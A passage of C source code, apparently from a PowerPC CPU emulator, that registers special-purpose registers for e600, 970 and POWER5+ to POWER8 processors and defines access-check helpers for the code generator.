XXX : not implemented */ spr_register(env, SPR_LDSTCR, "LDSTCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_ICTRL, "ICTRL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MSSSR0, "MSSSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC5, "PMC5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC5, "UPMC5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC6, "PMC6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC6, "UPMC6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* SPRGs */ spr_register(env, SPR_SPRG4, "SPRG4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG4, "USPRG4", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG5, "SPRG5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG5, "USPRG5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG6, "SPRG6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG6, "USPRG6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG7, "SPRG7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG7, "USPRG7", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_74xx_soft_tlb(env, 128, 2); init_excp_7450(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(e600)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC e600"; pcc->init_proc = init_proc_e600; pcc->check_pow = check_pow_hid0_74xx; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_74xx_TLB | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->insns_flags2 = PPC_NONE; pcc->msr_mask = (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } #if defined(TARGET_PPC64) #define POWERPC970_HID5_INIT 0x00000000 static void gen_fscr_facility_check(DisasContext *ctx, int facility_sprn, int bit, int sprn, int cause) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t1 = tcg_const_i32(tcg_ctx, bit); TCGv_i32 t2 = tcg_const_i32(tcg_ctx, sprn); TCGv_i32 t3 = tcg_const_i32(tcg_ctx, cause); gen_helper_fscr_facility_check(tcg_ctx, tcg_ctx->cpu_env, t1, t2, t3); tcg_temp_free_i32(tcg_ctx, t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t1); } static void gen_msr_facility_check(DisasContext *ctx, int facility_sprn, int bit, int sprn, int cause) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t1 = tcg_const_i32(tcg_ctx, bit); TCGv_i32 t2 = tcg_const_i32(tcg_ctx, sprn); TCGv_i32 t3 = tcg_const_i32(tcg_ctx, cause); gen_helper_msr_facility_check(tcg_ctx, tcg_ctx->cpu_env, t1, t2, t3); tcg_temp_free_i32(tcg_ctx, t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t1); } static void spr_read_prev_upper32(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv spr_up = tcg_temp_new(tcg_ctx); TCGv spr = tcg_temp_new(tcg_ctx); gen_load_spr(tcg_ctx, spr, sprn - 1); tcg_gen_shri_tl(tcg_ctx, spr_up, spr, 32); tcg_gen_ext32u_tl(tcg_ctx, cpu_gpr[gprn], spr_up); tcg_temp_free(tcg_ctx, spr); tcg_temp_free(tcg_ctx, spr_up); } static void spr_write_prev_upper32(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv spr = tcg_temp_new(tcg_ctx); gen_load_spr(tcg_ctx, spr, sprn - 1); tcg_gen_deposit_tl(tcg_ctx, spr, spr, cpu_gpr[gprn], 32, 32); gen_store_spr(tcg_ctx, sprn - 1, spr); tcg_temp_free(tcg_ctx, spr); } static int check_pow_970(CPUPPCState *env) { if (env->spr[SPR_HID0] & (HID0_DEEPNAP | HID0_DOZE | HID0_NAP)) { return 1; } return 0; } static void gen_spr_970_hid(CPUPPCState *env) { /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_clear, 0x60000000); spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_970_HID5, "HID5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, POWERPC970_HID5_INIT); } static void gen_spr_970_hior(CPUPPCState *env) { spr_register(env, SPR_HIOR, "SPR_HIOR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_hior, &spr_write_hior, 0x00000000); } static void gen_spr_book3s_ctrl(CPUPPCState *env) { spr_register(env, SPR_CTRL, "SPR_CTRL", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_write_generic, 0x00000000); spr_register(env, SPR_UCTRL, "SPR_UCTRL", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); } static void gen_spr_book3s_altivec(CPUPPCState *env) { if (!(env->insns_flags & PPC_ALTIVEC)) { return; } spr_register_kvm(env, SPR_VRSAVE, "VRSAVE", &spr_read_generic, &spr_write_generic, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_VRSAVE, 0x00000000); /* * Can't find information on what this should be on reset. This * value is the one used by 74xx processors. */ vscr_init(env, 0x00010000); } static void gen_spr_book3s_dbg(CPUPPCState *env) { /* * TODO: different specs define different scopes for these, * will have to address this: * 970: super/write and super/read * powerisa 2.03..2.04: hypv/write and super/read. * powerisa 2.05 and newer: hypv/write and hypv/read. */ spr_register_kvm(env, SPR_DABR, "DABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DABR, 0x00000000); spr_register_kvm(env, SPR_DABRX, "DABRX", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DABRX, 0x00000000); } static void gen_spr_book3s_207_dbg(CPUPPCState *env) { spr_register_kvm_hv(env, SPR_DAWR, "DAWR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DAWR, 0x00000000); spr_register_kvm_hv(env, SPR_DAWRX, "DAWRX", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DAWRX, 0x00000000); spr_register_kvm_hv(env, SPR_CIABR, "CIABR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_CIABR, 0x00000000); } static void gen_spr_970_dbg(CPUPPCState *env) { /* Breakpoints */ spr_register(env, SPR_IABR, "IABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_book3s_pmu_sup(CPUPPCState *env) { spr_register_kvm(env, SPR_POWER_MMCR0, "MMCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_MMCR0, 0x00000000); spr_register_kvm(env, SPR_POWER_MMCR1, "MMCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_MMCR1, 0x00000000); spr_register_kvm(env, SPR_POWER_MMCRA, "MMCRA", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_MMCRA, 0x00000000); spr_register_kvm(env, SPR_POWER_PMC1, "PMC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC1, 0x00000000); spr_register_kvm(env, SPR_POWER_PMC2, "PMC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC2, 0x00000000); spr_register_kvm(env, SPR_POWER_PMC3, "PMC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC3, 0x00000000); spr_register_kvm(env, SPR_POWER_PMC4, "PMC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC4, 0x00000000); spr_register_kvm(env, SPR_POWER_PMC5, "PMC5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC5, 0x00000000); spr_register_kvm(env, SPR_POWER_PMC6, "PMC6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC6, 0x00000000); spr_register_kvm(env, SPR_POWER_SIAR, "SIAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_SIAR, 0x00000000); spr_register_kvm(env, SPR_POWER_SDAR, "SDAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_SDAR, 0x00000000); } static void gen_spr_book3s_pmu_user(CPUPPCState *env) { spr_register(env, SPR_POWER_UMMCR0, "UMMCR0", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UMMCR1, "UMMCR1", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UMMCRA, "UMMCRA", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UPMC1, "UPMC1", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UPMC2, "UPMC2", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UPMC3, "UPMC3", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UPMC4, "UPMC4", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UPMC5, "UPMC5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UPMC6, "UPMC6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_USIAR, "USIAR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_USDAR, "USDAR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); } static void gen_spr_970_pmu_sup(CPUPPCState *env) { spr_register_kvm(env, SPR_970_PMC7, "PMC7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC7, 0x00000000); spr_register_kvm(env, SPR_970_PMC8, "PMC8", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC8, 0x00000000); } static void gen_spr_970_pmu_user(CPUPPCState *env) { spr_register(env, SPR_970_UPMC7, "UPMC7", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_970_UPMC8, "UPMC8", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); } static void gen_spr_power8_pmu_sup(CPUPPCState *env) { spr_register_kvm(env, SPR_POWER_MMCR2, "MMCR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_MMCR2, 0x00000000); spr_register_kvm(env, SPR_POWER_MMCRS, "MMCRS", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_MMCRS, 0x00000000); spr_register_kvm(env, SPR_POWER_SIER, "SIER", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_SIER, 0x00000000); spr_register_kvm(env, SPR_POWER_SPMC1, "SPMC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_SPMC1, 0x00000000); spr_register_kvm(env, SPR_POWER_SPMC2, "SPMC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_SPMC2, 0x00000000); spr_register_kvm(env, SPR_TACR, "TACR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_TACR, 0x00000000); spr_register_kvm(env, SPR_TCSCR, "TCSCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_TCSCR, 0x00000000); spr_register_kvm(env, SPR_CSIGR, "CSIGR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_CSIGR, 0x00000000); } static void gen_spr_power8_pmu_user(CPUPPCState *env) { spr_register(env, SPR_POWER_UMMCR2, "UMMCR2", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_USIER, "USIER", &spr_read_generic, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_power5p_ear(CPUPPCState *env) { /* External access control */ spr_register(env, SPR_EAR, "EAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_power5p_tb(CPUPPCState *env) { /* TBU40 (High 40 bits of the Timebase register */ spr_register_hv(env, SPR_TBU40, "TBU40", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_write_tbu40, 0x00000000); } static void spr_write_hmer(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv hmer = tcg_temp_new(tcg_ctx); gen_load_spr(tcg_ctx, hmer, sprn); tcg_gen_and_tl(tcg_ctx, hmer, cpu_gpr[gprn], hmer); gen_store_spr(tcg_ctx, sprn, hmer); spr_store_dump_spr(sprn); tcg_temp_free(tcg_ctx, hmer); } static void spr_write_lpcr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_lpcr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void gen_spr_970_lpar(CPUPPCState *env) { /* * PPC970: HID4 covers things later controlled by the LPCR and * RMOR in later CPUs, but with a different encoding. We only * support the 970 in "Apple mode" which has all hypervisor * facilities disabled by strapping, so we can basically just * ignore it */ spr_register(env, SPR_970_HID4, "HID4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_power5p_lpar(CPUPPCState *env) { /* Logical partitionning */ spr_register_kvm_hv(env, SPR_LPCR, "LPCR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_lpcr, KVM_REG_PPC_LPCR, LPCR_LPES0 | LPCR_LPES1); spr_register_hv(env, SPR_HDEC, "HDEC", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_hdecr, &spr_write_hdecr, 0); } static void gen_spr_book3s_ids(CPUPPCState *env) { /* FIXME: Will need to deal with thread vs core only SPRs */ /* Processor identification */ spr_register_hv(env, SPR_PIR, "PIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, &spr_read_generic, NULL, 0x00000000); spr_register_hv(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_TSCR, "TSCR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_HMER, "HMER", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_hmer, 0x00000000); spr_register_hv(env, SPR_HMEER, "HMEER", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_TFMR, "TFMR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_LPIDR, "LPIDR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_lpidr, 0x00000000); spr_register_hv(env, SPR_HFSCR, "HFSCR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_MMCRC, "MMCRC", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_MMCRH, "MMCRH", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_HSPRG0, "HSPRG0", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_HSPRG1, "HSPRG1", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_HSRR0, "HSRR0", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_HSRR1, "HSRR1", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_HDAR, "HDAR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_HDSISR, "HDSISR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_HRMOR, "HRMOR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_rmor(CPUPPCState *env) { spr_register_hv(env, SPR_RMOR, "RMOR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_power8_ids(CPUPPCState *env) { /* Thread identification */ spr_register(env, SPR_TIR, "TIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); } static void gen_spr_book3s_purr(CPUPPCState *env) { /* PURR & SPURR: Hack - treat these as aliases for the TB for now */ spr_register_kvm_hv(env, SPR_PURR, "PURR", &spr_read_purr, SPR_NOACCESS, &spr_read_purr, SPR_NOACCESS, &spr_read_purr, &spr_write_purr, KVM_REG_PPC_PURR, 0x00000000); spr_register_kvm_hv(env, SPR_SPURR, "SPURR", &spr_read_purr, SPR_NOACCESS, &spr_read_purr, SPR_NOACCESS, &spr_read_purr, &spr_write_purr, KVM_REG_PPC_SPURR, 0x00000000); } static void gen_spr_power6_dbg(CPUPPCState *env) { spr_register(env, SPR_CFAR, "SPR_CFAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_cfar, &spr_write_cfar, 0x00000000); } static void gen_spr_power5p_common(CPUPPCState *env) { spr_register_kvm(env, SPR_PPR, "PPR", &spr_read_generic, &spr_write_generic, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PPR, 0x00000000); } static void gen_spr_power6_common(CPUPPCState *env) { spr_register_kvm(env, SPR_DSCR, "SPR_DSCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DSCR, 0x00000000); /* * Register PCR to report POWERPC_EXCP_PRIV_REG instead of * POWERPC_EXCP_INVAL_SPR in userspace. Permit hypervisor access. */ spr_register_hv(env, SPR_PCR, "PCR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pcr, 0x00000000); } static void spr_read_tar(DisasContext *ctx, int gprn, int sprn) { gen_fscr_facility_check(ctx, SPR_FSCR, FSCR_TAR, sprn, FSCR_IC_TAR); spr_read_generic(ctx, gprn, sprn); } static void spr_write_tar(DisasContext *ctx, int sprn, int gprn) { gen_fscr_facility_check(ctx, SPR_FSCR, FSCR_TAR, sprn, FSCR_IC_TAR); spr_write_generic(ctx, sprn, gprn); } static void gen_spr_power8_tce_address_control(CPUPPCState *env) { spr_register_kvm(env, SPR_TAR, "TAR", &spr_read_tar, &spr_write_tar, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_TAR, 0x00000000); } static void spr_read_tm(DisasContext *ctx, int gprn, int sprn) { gen_msr_facility_check(ctx, SPR_FSCR, MSR_TM, sprn, FSCR_IC_TM); spr_read_generic(ctx, gprn, sprn); } static void spr_write_tm(DisasContext *ctx, int sprn, int gprn) { gen_msr_facility_check(ctx, SPR_FSCR, MSR_TM, sprn, FSCR_IC_TM); spr_write_generic(ctx, sprn, gprn); } static void spr_read_tm_upper32(DisasContext *ctx, int gprn, int sprn) { gen_msr_facility_check(ctx, SPR_FSCR, MSR_TM, sprn, FSCR_IC_TM); spr_read_prev_upper32(ctx, gprn, sprn); } static void spr_write_tm_upper32(DisasContext *ctx, int sprn, int gprn) { gen_msr_facility_check(ctx, SPR_FSCR, MSR_TM, sprn, FSCR_IC_TM); spr_write_prev_upper32(ctx, sprn, gprn); } static void gen_spr_power8_tm(CPUPPCState *env) { spr_register_kvm(env, SPR_TFHAR, "TFHAR", &spr_read_tm, &spr_write_tm, &spr_read_tm, &spr_write_tm, KVM_REG_PPC_TFHAR, 0x00000000); spr_register_kvm(env, SPR_TFIAR, "TFIAR", &spr_read_tm, &spr_write_tm, &spr_read_tm, &spr_write_tm, KVM_REG_PPC_TFIAR, 0x00000000); spr_register_kvm(env, SPR_TEXASR, "TEXASR", &spr_read_tm, &spr_write_tm, &spr_read_tm, &spr_write_tm, KVM_REG_PPC_TEXASR, 0x00000000); spr_register(env, SPR_TEXASRU, "TEXASRU", &spr_read_tm_upper32, &spr_write_tm_upper32, &spr_read_tm_upper32, &spr_write_tm_upper32, 0x00000000); } static void spr_read_ebb(DisasContext *ctx, int gprn, int sprn) { gen_fscr_facility_check(ctx, SPR_FSCR, FSCR_EBB, sprn, FSCR_IC_EBB); spr_read_generic(ctx, gprn, sprn); } static void spr_write_ebb(DisasContext *ctx, int sprn, int gprn) { gen_fscr_facility_check(ctx, SPR_FSCR, FSCR_EBB, sprn, FSCR_IC_EBB); spr_write_generic(ctx, sprn, gprn); } static void spr_read_ebb_upper32(DisasContext *ctx, int gprn, int sprn) { gen_fscr_facility_check(ctx, SPR_FSCR, FSCR_EBB, sprn, FSCR_IC_EBB); spr_read_prev_upper32(ctx, gprn, sprn); } static void spr_write_ebb_upper32(DisasContext *ctx, int sprn, int gprn) { gen_fscr_facility_check(ctx, SPR_FSCR, FSCR_EBB, sprn, FSCR_IC_EBB); spr_write_prev_upper32(ctx, sprn, gprn); } static void gen_spr_power8_ebb(CPUPPCState *env) { spr_register(env, SPR_BESCRS, "BESCRS", &spr_read_ebb, &spr_write_ebb, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BESCRSU, "BESCRSU", &spr_read_ebb_upper32, &spr_write_ebb_upper32, &spr_read_prev_upper32, &spr_write_prev_upper32, 0x00000000); spr_register(env, SPR_BESCRR, "BESCRR", &spr_read_ebb, &spr_write_ebb, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BESCRRU, "BESCRRU", &spr_read_ebb_upper32, &spr_write_ebb_upper32, &spr_read_prev_upper32, &spr_write_prev_upper32, 0x00000000); spr_register_kvm(env, SPR_EBBHR, "EBBHR", &spr_read_ebb, &spr_write_ebb, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_EBBHR, 0x00000000); spr_register_kvm(env, SPR_EBBRR, "EBBRR", &spr_read_ebb, &spr_write_ebb, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_EBBRR, 0x00000000); spr_register_kvm(env, SPR_BESCR, "BESCR", &spr_read_ebb, &spr_write_ebb, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_BESCR, 0x00000000); } /* Virtual Time Base */ static void gen_spr_vtb(CPUPPCState *env) { spr_register_kvm_hv(env, SPR_VTB, "VTB", SPR_NOACCESS, SPR_NOACCESS, &spr_read_vtb, SPR_NOACCESS, &spr_read_vtb, &spr_write_vtb, KVM_REG_PPC_VTB, 0x00000000); } static void gen_spr_power8_fscr(CPUPPCState *env) { target_ulong initval = 0; spr_register_kvm(env, SPR_FSCR, "FSCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_FSCR, initval); } static void gen_spr_power8_pspb(CPUPPCState *env) { spr_register_kvm(env, SPR_PSPB, "PSPB", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic32, KVM_REG_PPC_PSPB, 0); } static void gen_spr_power8_dpdes(CPUPPCState *env) { /* Directed Privileged Door-bell Exception State, used for IPI */ spr_register_kvm_hv(env, SPR_DPDES, "DPDES", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dpdes, SPR_NOACCESS, &spr_read_dpdes, &spr_write_dpdes, KVM_REG_PPC_DPDES, 0x00000000); } static void gen_spr_power8_ic(CPUPPCState *env) { spr_register_hv(env, SPR_IC, "IC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0); } static void gen_spr_power8_book4(CPUPPCState *env) { /* Add a number of P8 book4 registers */ spr_register_kvm(env, SPR_ACOP, "ACOP", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_ACOP, 0); spr_register_kvm(env, SPR_BOOKS_PID, "PID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pidr, KVM_REG_PPC_PID, 0); spr_register_kvm(env, SPR_WORT, "WORT", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_WORT, 0); } static void gen_spr_power7_book4(CPUPPCState *env) { /* Add a number of P7 book4 registers */ spr_register_kvm(env, SPR_ACOP, "ACOP", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 